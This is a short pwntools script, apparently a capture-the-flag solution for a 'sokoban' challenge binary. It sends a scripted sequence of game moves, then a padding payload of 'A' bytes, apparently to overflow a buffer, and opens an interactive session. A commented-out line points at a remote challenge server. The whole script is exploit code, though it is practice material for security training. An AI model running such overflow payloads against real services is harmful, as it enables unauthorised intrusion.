from pwn import *

p =process("sokoban")
#p=remote("61.147.171.105",54042)
p.sendline("d")
p.sendline("d")

p.sendline("w")
p.sendline("w")
p.sendline("w")
p.sendline("w")
p.sendline("s")
p.sendline("s")
p.sendline("d")
p.sendline("w")
p.sendline("w")
p.sendline("s")
p.sendline("a")
p.sendline("s")
p.sendline("s")
p.sendline("s")
p.sendline("s")
p.sendline("d")
p.sendline("w")
p.sendline("w")
p.sendline("w")
p.sendline("s")
p.sendline("s")
p.sendline("s")
p.sendline("d")
p.sendline("w")
p.sendline("w")
#游戏通关
payload=b"A"*(0x13-0x8)
p.sendline(payload)
p.interactive()